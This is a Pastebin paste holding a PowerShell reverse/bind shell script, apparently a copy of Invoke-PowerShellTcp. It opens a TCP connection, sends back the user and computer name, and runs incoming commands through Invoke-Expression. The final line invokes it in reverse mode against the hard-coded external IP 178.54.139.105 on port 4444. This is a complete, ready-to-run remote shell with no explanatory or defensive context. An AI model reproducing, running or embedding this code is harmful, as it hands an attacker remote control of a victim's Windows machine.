API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 12th, 2019
574
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
raw download clone embed print report
  1. function Invoke-PowerShellTcp
  2. {
  3. [CmdletBinding(DefaultParameterSetName="reverse")] Param(
  4.  
  5. [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
  6. [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
  7. [String]
  8. $IPAddress,
  9.  
  10. [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
  11. [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
  12. [Int]
  13. $Port,
  14.  
  15. [Parameter(ParameterSetName="reverse")]
  16. [Switch]
  17. $Reverse,
  18.  
  19. [Parameter(ParameterSetName="bind")]
  20. [Switch]
  21. $Bind
  22.  
  23. )
  24.  
  25.  
  26. try
  27. {
  28. #Connect back if the reverse switch is used.
  29. if ($Reverse)
  30. {
  31. $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
  32. }
  33.  
  34. #Bind to the provided port if Bind switch is used.
  35. if ($Bind)
  36. {
  37. $listener = [System.Net.Sockets.TcpListener]$Port
  38. $listener.start()
  39. $client = $listener.AcceptTcpClient()
  40. }
  41.  
  42. $stream = $client.GetStream()
  43. [byte[]]$bytes = 0..65535|%{0}
  44.  
  45. #Send back current username and computername
  46. $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
  47. $stream.Write($sendbytes,0,$sendbytes.Length)
  48.  
  49. #Show an interactive PowerShell prompt
  50. $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
  51. $stream.Write($sendbytes,0,$sendbytes.Length)
  52.  
  53. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  54. {
  55. $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
  56. $data = $EncodedText.GetString($bytes,0, $i)
  57. try
  58. {
  59. #Execute the command on the target.
  60. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
  61. }
  62. catch
  63. {
  64. Write-Warning "Something went wrong with execution of command on the target."
  65. Write-Error $_
  66. }
  67. $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
  68. $x = ($error[0] | Out-String)
  69. $error.clear()
  70. $sendback2 = $sendback2 + $x
  71.  
  72. #Return the results
  73. $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
  74. $stream.Write($sendbyte,0,$sendbyte.Length)
  75. $stream.Flush()
  76. }
  77. $client.Close()
  78. if ($listener)
  79. {
  80. $listener.Stop()
  81. }
  82. }
  83. catch
  84. {
  85. Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
  86. Write-Error $_
  87. }
  88. }
  89. Invoke-PowerShellTcp -Reverse -IPAddress 178.54.139.105 -Port 4444
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!